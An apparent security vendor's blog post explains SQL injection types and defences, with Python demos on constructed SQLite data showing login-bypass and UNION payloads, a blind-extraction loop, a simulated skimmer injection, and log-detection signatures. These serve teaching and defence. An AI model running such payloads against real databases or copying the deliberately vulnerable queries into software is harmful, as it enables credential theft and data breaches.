SQL Injections: Is There a Way for Real-Time Tracking and Prevention?

What is an SQL Injection (SQLi)?

SQL injection (SQLi) is one of the most common code-injection techniques and is used to read or modify data in an application’s database. The attacker does not place code in the database itself; they supply input (through a form field, URL parameter, cookie or any other user-controlled value) that the application glues into an SQL query, so that the input is executed as part of the query.

SQL injection occurs when an application asks a user for input, such as a username or user ID, builds a query by concatenating that input into an SQL string, and sends the result to the database. Instead of a name or ID, the attacker supplies a fragment of SQL, and the application runs it without realising.

An attacker may read every username and password hash in a database by inserting a small piece of SQL into the login form, but any other input that reaches a query is an equally good entry point: search boxes, registration forms, and even a website chatbot that looks up its answers in a database.


Do SQL Injections still work in 2021?

23 years after they were first exploited in the wild, SQL injections remain one of the top causes of security breaches, for a simple reason: they still work. As long as there are so many vulnerable web applications sitting in front of databases full of monetizable information, SQL injection attacks will continue.

Akamai’s State of the Internet / Security report states that in 2020 the global video game industry suffered more than 240 million web application attacks, a 340% increase over 2019, as more people turned to digital entertainment during the pandemic. The top attack vector was SQL injection (SQLi), accounting for 59% of all attacks against the gaming industry and targeting player login credentials and personal information.

Earlier this month, Electronic Arts (EA) confirmed that attackers gained access to some of its systems and stole source code. That intrusion has not been attributed to SQL injection, but it shows how attractive the industry’s systems are to attackers.


As we discussed previously, government data breaches have been accelerating since 2019 as public bodies digitally transform. In the summer of 2019, it was revealed that the tax data of millions of Bulgarian citizens had been stolen. The attacker circulated a link to approximately 10 GB of data taken from the Bulgarian National Revenue Agency; the records reportedly contained tax data for 5 million citizens spanning 10 years. It was later established that an SQL injection was used to extract sensitive data about nearly the whole adult population of a country.

This said, SQLi is not only still widely used in 2021; the attacks are also evolving. Most SQL injection attacks are now automated: scanners probe every reachable input on every site they find, and the vulnerable sites that happen to hold sensitive data are the ones that get exploited.

What is the purpose of an SQL Injection?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries an application makes to its database. Most often it lets the attacker read data they should not be able to retrieve, but because the injected SQL runs with the application’s own database privileges it can also bypass authentication, impersonate other users, and modify or delete existing data.
Attackers are most often financially motivated, which is why the gaming industry, with its player accounts and personal data, has become one of their main targets in recent years.

Types of SQL Injections

There are several types of SQL injections (or SQLi):

  • In-band SQLi – used when the attacker can both inject the code and gather the results over the same communication channel (the normal HTTP response). It has two variants:
    • Error-based SQLi – relies on the error messages returned by the database server: the attacker crafts input so that the data they want (table names, column names, row contents) ends up inside the text of an error, which the application then displays.
    • Union-based SQLi – uses the UNION SQL operator to append the results of an attacker-chosen SELECT to the results of the application’s own query, so the stolen rows come back in the normal HTTP response. For this to work, the injected SELECT must return the same number of columns as the original query, with compatible types. The attacker typically discovers the column count with ORDER BY or NULL probes, and table and column names from the database’s metadata (such as information_schema), so not knowing a table name in advance is only a minor obstacle.

How to prevent In-Band SQLi? 

Always use prepared statements (parameterized queries): the query text and the user-supplied values are sent to the database separately, so input can never change the structure of the query. That is programming advice, though. What if you can’t change the source code?

Then you can only reduce what the attacker gets; you cannot remove the vulnerability. Disabling detailed error reporting (returning a generic error page instead of the database’s own message) closes the error-based channel and should be done regardless, but it does nothing against union-based injection, which needs no error messages, and it merely turns what is left into a blind injection rather than fixing it. Other stop-gaps are a web application firewall or virtual patching in front of the application, least-privilege database accounts so that an injected query cannot read tables the page never needs, and monitoring the logs for injection attempts.
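To make the difference concrete, here is an added example (not code from the original article or from LogSentinel), written in Python against an in-memory SQLite database with constructed demo tables `users` and `products`. It shows a login check and a product search built by string concatenation, the payloads that bypass the login and dump the `users` table through a UNION, the same payloads rendered harmless by prepared statements, and that hiding error messages leaves the UNION dump working.

```python
import sqlite3


def make_db():
    """Constructed demo data for this example; not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 's3cret-A'), ('bob', 's3cret-B');
        CREATE TABLE products(name TEXT, price INTEGER);
        INSERT INTO products VALUES ('Laptop', 1200), ('Mouse', 25);
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation: the classic bug."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with a prepared statement: values are bound, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, name, verbose_errors=True):
    """Product search by concatenation; verbose_errors=False simulates 'error reporting disabled'."""
    sql = "SELECT name, price FROM products WHERE name = '" + name + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return [("error", str(exc))] if verbose_errors else []


def search_safe(conn, name):
    """Parameterized product search: the payload is just a product name that does not exist."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (name,)).fetchall()


# Payloads: the first comments out the password check, the second appends a UNION.
LOGIN_BYPASS = "alice'--"
UNION_DUMP = "' UNION SELECT username, password FROM users--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, LOGIN_BYPASS, "wrong"))
    print("safe login:      ", login_safe(db, LOGIN_BYPASS, "wrong"))
    print("union dump:      ", search_vulnerable(db, UNION_DUMP))
    print("errors hidden:   ", search_vulnerable(db, UNION_DUMP, verbose_errors=False))
    print("single quote:    ", search_vulnerable(db, "'"),
          search_vulnerable(db, "'", verbose_errors=False))
    print("safe search:     ", search_safe(db, UNION_DUMP))
```

The only line that matters for the fix is the `?` placeholder with the values passed as a separate tuple; whether the driver calls them prepared statements, parameterized queries or bind variables, the property is the same, and it holds for every database, not just SQLite.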

  • Inferential SQLi – this type is also called “blind” because the attacker never sees the result of the injected query in the response. Instead, the attacker asks the database yes/no questions and reconstructs its structure and contents from the answers:
    • Boolean-based SQLi – the injected condition makes the query return either rows or nothing, so the HTTP response either changes or stays the same. The attacker gets no data directly but can test one bit at a time (is the first character of the admin password greater than “m”?). This technique is slow, since every character may take several requests, but with automation it still extracts entire tables and can do a lot of damage.
    • Time-based SQLi – the injected condition makes the database pause (with a function such as SLEEP) for a given number of seconds only when the condition is true, so the response time reveals TRUE or FALSE. It works exactly like the boolean-based technique, is used when the page content does not change at all, and is even slower.
  • Out-of-band SQLi – used when the attacker cannot retrieve results over the same channel as the injection, for example because the response is neither changed nor delayed. It relies on the database server’s ability to make DNS or HTTP requests, which carry the stolen data to a host the attacker controls. Egress filtering on database servers is the matching defence, and outbound DNS or HTTP from a database host is itself a strong signal in the logs.
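Added example, not from the original article or LogSentinel: boolean-based blind extraction in Python against an in-memory SQLite table with a constructed `products`/`users` schema. The `Oracle` class stands in for a page that only reveals whether a product exists; `blind_extract` recovers a secret one character at a time by binary search over the character’s code point, and the `requests` counter shows why the technique is slow. The time-based variant is the same loop with a delay condition and a stopwatch instead of a content check (SQLite has no SLEEP function, so it is not shown). The same oracle with `safe=True` uses a prepared statement and yields nothing.

```python
import sqlite3


def demo_db():
    """Constructed demo data for this example; not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 's3cret-A');
        CREATE TABLE products(name TEXT);
        INSERT INTO products VALUES ('Laptop');
    """)
    return conn


class Oracle:
    """Stands in for a web page that only says whether a product exists (no data, no errors)."""

    def __init__(self, conn, safe=False):
        self.conn = conn
        self.safe = safe
        self.requests = 0  # how many HTTP requests the attack would cost

    def exists(self, name):
        self.requests += 1
        if self.safe:
            row = self.conn.execute(
                "SELECT 1 FROM products WHERE name = ?", (name,)).fetchone()
        else:
            try:
                row = self.conn.execute(
                    "SELECT 1 FROM products WHERE name = '" + name + "'").fetchone()
            except sqlite3.Error:
                row = None  # error reporting disabled: the page just says "not found"
        return row is not None


def blind_extract(oracle, secret_sql, max_len=64):
    """Boolean-based blind extraction: one yes/no answer per request.

    secret_sql is a scalar subquery the attacker wants the value of, e.g.
    'SELECT password FROM users LIMIT 1'. 'Laptop' is a known product name
    that makes the base query true, so the injected AND clause decides the answer.
    """
    known = "Laptop"
    out = ""
    for i in range(1, max_len + 1):
        # Is there an i-th character at all?
        if not oracle.exists(f"{known}' AND length(({secret_sql})) >= {i}--"):
            break
        lo, hi = 32, 126  # assumption: printable ASCII; binary search the code point
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{known}' AND unicode(substr(({secret_sql}),{i},1)) > {mid}--"
            if oracle.exists(probe):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


SECRET = "SELECT password FROM users LIMIT 1"

if __name__ == "__main__":
    vulnerable = Oracle(demo_db())
    print(blind_extract(vulnerable, SECRET), "in", vulnerable.requests, "requests")
    hardened = Oracle(demo_db(), safe=True)
    print(repr(blind_extract(hardened, SECRET)), "in", hardened.requests, "requests")
```

Roughly seven requests per character is what makes blind injection “slow”, and it is also what makes it visible: one client sending dozens of near-identical requests to the same page, differing only in a numeric comparison, is exactly the pattern a log-based detector should look for.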

Why is it essential to use real-time tracking with detailed reporting?

To detect such attacks in real time and prevent a data breach, it is vital to have a tool that gives a Data Protection Officer, a CISO or a Quality Auditor real-time access to event logs that cannot be manipulated (tamper-evident, so that an attacker who reaches the server cannot quietly erase their traces). This helps the organization resolve an issue before it has impacted the company’s assets and reputation. Furthermore, since GDPR went into effect, every company is obliged to report a personal data breach to the regulator within 72 hours of becoming aware of it (Article 33), which is only feasible with reliable, searchable logs of what was accessed and when.

SQLi Best Practices for Real-Time Detection and Prevention

As we said, SQL injections are not a new invention. They have been around for many years, so security specialists have found ways to prevent them. Here are some of the best practices to ensure your data will not be affected by SQLi:

Test Your Forms for Vulnerabilities

It’s important to pen-test every form you expose publicly, and every other input that reaches a query (URL parameters, cookies, headers, API fields), and make sure they are not vulnerable.

Some systems or websites are complex and contain sensitive data, and testing them manually is difficult and time-consuming. In such cases, testing for SQLi with dedicated tools is far more efficient. There are many automated SQLi testing tools on the market (sqlmap is the best-known open-source one), and a dynamic application security scanner run against a staging copy of the site will exercise every input with the error-based, union-based, blind and time-based techniques described above.

Encrypt Your Data to Prevent Leaks

To add an extra layer of security, it’s recommended to encrypt your data. This way an attacker who dumps the database will not be able to read it unless they also obtain the decryption key.

However, if all of your databases are encrypted with a single key, that key is necessarily available to the application, and an attacker who has the whole dump only needs that one key to read everything. That’s why we created SentinelDB – a per-record encrypted database. Its technology guarantees strong protection of your data, and at the same time it does not compromise overall performance. Note that encryption is a mitigation for data theft, not a fix for the injection itself: an injected query that the application executes with its own privileges may still return decrypted data, so encryption complements prepared statements rather than replacing them.

Scan Your Code for SQLi

Injection points are not limited to HTML form fields and query strings. Cookies, HTTP headers and uploaded data files are also user-controlled input, and any of them can reach a query.

Leverage real-time integrity monitoring to ensure that no one has tampered with your code or data. Dynamic web vulnerability scanners find injection flaws by attacking a running copy of the application; static analysers find them by scanning the source for queries built by string concatenation; and integrity monitors watch the deployed files in real time for changes you did not make.

LogSentinel SIEM has a built-in Website Integrity Monitoring feature that scans your website code for changes. Injected or modified scripts are how attackers monetize a compromised site, so the feature helps you detect threats such as:

  • Credit Card Theft – stop criminals from stealing customer credit card information
  • Credential Theft – stop malicious actors from obtaining customer and employee credentials
  • Sensitive Data Leaks – don’t let attackers use injected scripts to leak sensitive corporate data
  • Magecart – a specific form of formjacking (injected scripts that skim payment forms) that is affecting thousands of websites
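An added illustration of how such integrity monitoring works (example code, not LogSentinel’s implementation): a SHA-256 baseline of the deployed web files, a comparison that reports added, removed and modified files, and a simple check of whether a changed file now contains a script tag or an obfuscation call. `demo()` builds a constructed site in a temporary directory, appends a skimmer-style script tag to the index page, and returns the diff. File names and the `cdn.example.net` host are made up for the example.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Only code and markup are watched; images and other binaries change legitimately and often.
WATCHED_SUFFIXES = {".html", ".htm", ".js", ".php", ".css"}

# Crude indicators that a changed file now carries injected script (assumed heuristics).
INJECTION_HINTS = re.compile(rb"<script[^>]*\bsrc=|\beval\(|document\.write\(|\batob\(", re.I)


def file_hash(path):
    """SHA-256 of a file, streamed so large files do not need to be held in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Map of relative path -> hash for every watched file under root (the baseline)."""
    root = Path(root)
    return {
        str(p.relative_to(root)): file_hash(p)
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES
    }


def compare(baseline, current):
    """Added, removed and modified files between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def looks_injected(path):
    """True if the file contains one of the script-injection indicators."""
    return INJECTION_HINTS.search(Path(path).read_bytes()) is not None


def demo():
    """Build a constructed site, take a baseline, simulate a compromise, report the diff."""
    with tempfile.TemporaryDirectory() as site:
        root = Path(site)
        (root / "index.html").write_text("<html><body>Shop</body></html>")
        (root / "app.js").write_text("console.log('app');")
        (root / "logo.png").write_bytes(b"\x89PNG not watched")
        baseline = snapshot(root)

        # Simulated attacker activity: inject a remote script, drop a new file, delete one.
        with open(root / "index.html", "a") as fh:
            fh.write('<script src="https://cdn.example.net/skim.js"></script>')
        (root / "checkout.js").write_text("var total = 0;")
        (root / "app.js").unlink()

        diff = compare(baseline, snapshot(root))
        suspicious = [p for p in diff["added"] + diff["modified"]
                      if looks_injected(root / p)]
        return diff, suspicious


if __name__ == "__main__":
    changes, flagged = demo()
    print(changes)
    print("suspicious:", flagged)
```

In production the baseline must be stored somewhere the web server cannot write to, and the comparison must run from outside the server; a monitor whose baseline sits next to the files it guards is edited along with them.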


Leverage Honeypot to Catch SQLi Attackers

A honeypot is a system that mimics real servers and is designed to attract attackers and scanners looking for vulnerabilities. Because nothing legitimate ever talks to it, every connection to it is suspicious by definition. When an attacker interacts with the honeypot, they leave traces, such as their IP address and the exact payloads they send, which the security team can use to take preventive measures on the real servers. In this way web application vulnerabilities can be detected, because the team can see how attackers try to bypass the defences and reach the data.

Here are some of the ways to leverage honeypot to prevent SQL injections:

  1. System vulnerabilities: the honeypot records which vulnerabilities the attacker scanned for in order to get into the system.
  2. Methods of attack: identify what methods the attacker used to capture data.
  3. Purpose of the attacks: attacks may aim at capturing, deleting or altering data in databases. Injected content may also be used to run malicious scripts in users’ browsers, to monitor them, redirect them to other websites or deliver malware.
  4. Frequency of attacks: the data recorded by the honeypot also shows how often the servers are exposed to attacks.
  5. Attack sources: the intruder’s IP address points to the source and origin of the attacks (bearing in mind that it is often a proxy, VPN or compromised host rather than the attacker’s own machine).
  6. Attack patterns: the honeypot logs every attack end to end, so the pattern of a successful attack can be identified among the others.
  7. Tools and techniques: the recorded information shows which tools and techniques attackers employ; for SQLi, automated tools are easy to recognise by their characteristic payloads and request rates.
  8. Prevention of future attacks: the patterns, frequency, techniques and tools the attacker used to exploit vulnerabilities in the web application are all stored, and this information feeds directly into preventive measures.

LogSentinel SIEM has a built-in honeypot feature that helps you detect such attacks and stay away from SQL injections. The LogSentinel SIEM Honeypot is a useful addition to our threat intelligence capabilities and allows for detecting early threats as well as collecting malicious actor behavior data. With LogSentinel SIEM Honeypot, your security team will be able to:

  • Detect Malicious IPs Early – by getting an early warning of IPs that are probing your infrastructure, you will be able to take timely measures such as blocking them
  • Monitor Malicious Actor Behavior – by monitoring and recording malicious actor behavior over multiple protocols (SSH, FTP, HTTP, RDP, SMB, etc.) you will be able to constantly improve the security of your servers in line with the ever-changing threat environment
  • Gain Threat Insights – the honeypot will help you understand how bots and human malicious actors approach your infrastructure, so you can protect it
  • Monitor the Overall Threat Level – by monitoring the increase or decrease of malicious attempts by country/region, protocol and other metrics, you can easily evaluate the risk of SQLi attacks and act accordingly

Leveraging Audit Trail for Real-Time SQLi Detection

You should have the capability to protect servers from a breach and keep your database under control. Logs cannot tell you whether a server is vulnerable, but they do show when someone is trying: injection attempts leave characteristic traces in web server access logs (quotes and SQL keywords in parameters, UNION SELECT, SLEEP or WAITFOR in requests, bursts of 500 errors from one IP as a scanner probes every parameter) and in database logs (syntax errors, unusual queries against metadata tables). Monitoring for those signs lets your security team react quickly from within LogSentinel’s centralized monitoring dashboard. Thanks to AI technology and pre-set security rules, you are alerted in real time when anomalies occur. LogSentinel SIEM has built-in capabilities to read website access logs and automatically detect SQLi attempts, sending real-time notifications to your IT security team.

Implementing an audit trail service such as LogSentinel SIEM is straightforward: integration is done through a RESTful API, and plugins are available for various systems.
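As an added example of what such detection looks like in practice (illustrative code, not LogSentinel’s detection engine), the Python below parses constructed access-log lines in the common log format, decodes the request target and matches the query string against a few SQLi signatures; a quote in a parameter followed by a 5xx response is reported as an error probe, and an IP that triggers several alerts is flagged as likely automated tooling. The IP addresses, paths and timestamps are made up. The search for “union square cafe” shows why a bare keyword match is not enough.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (common log format); not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2021:12:00:01 +0000] "GET /product?id=42 HTTP/1.1" 200 1532
203.0.113.7 - - [10/Jun/2021:12:00:02 +0000] "GET /product?id=42' HTTP/1.1" 500 213
203.0.113.7 - - [10/Jun/2021:12:00:03 +0000] "GET /product?id=42%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 200 2011
203.0.113.7 - - [10/Jun/2021:12:00:04 +0000] "GET /product?id=42%20AND%20SLEEP(5) HTTP/1.1" 200 1532
198.51.100.9 - - [10/Jun/2021:12:00:05 +0000] "GET /search?q=union+square+cafe HTTP/1.1" 200 884
198.51.100.9 - - [10/Jun/2021:12:00:06 +0000] "POST /login HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signature rules, checked in order against the URL-decoded query string.
# Each is a deliberately narrow pattern: "union" alone would flag ordinary searches.
SQLI_RULES = [
    ("union-based", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("tautology", re.compile(r"\bor\b\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
    ("time-based", re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay", re.I)),
    ("metadata/stacked", re.compile(r"information_schema|;\s*(drop|insert|update|delete)\b", re.I)),
    ("comment-terminator", re.compile(r"(--|/\*)\s*$")),
]


def classify(entry):
    """Return the name of the first matching rule for one parsed log entry, or None."""
    query = unquote_plus(entry["target"]).partition("?")[2]
    for name, pattern in SQLI_RULES:
        if pattern.search(query):
            return name
    # A lone quote that produced a server error is the classic first probe of a scanner.
    if ("'" in query or '"' in query) and entry["status"].startswith("5"):
        return "error-probe"
    return None


def analyze(log_text, burst_threshold=3):
    """Parse the log, emit one alert per suspicious request, flag IPs with repeated hits."""
    alerts = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        entry = match.groupdict()
        rule = classify(entry)
        if rule:
            alerts.append({
                "ip": entry["ip"],
                "time": entry["ts"],
                "rule": rule,
                "status": entry["status"],
                "request": unquote_plus(entry["target"]),
            })
    per_ip = Counter(a["ip"] for a in alerts)
    flagged_ips = sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)
    return alerts, flagged_ips


if __name__ == "__main__":
    found, noisy = analyze(SAMPLE_LOG)
    for alert in found:
        print(f"{alert['ip']} {alert['rule']:18} {alert['status']} {alert['request']}")
    print("likely automated:", noisy)
```

Signatures like these catch scanners and casual attempts; they will not catch a careful attacker who encodes payloads differently or keeps them in POST bodies that the access log does not record, which is why the same rules should also be applied to the database server’s own query log, where the injected SQL appears decoded and in full.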

If you would like to find out more about how to protect your databases from SQL injection by leveraging a Next-Generation SIEM, request a quick 30-minute demo with us and we will guide you through the whole process:

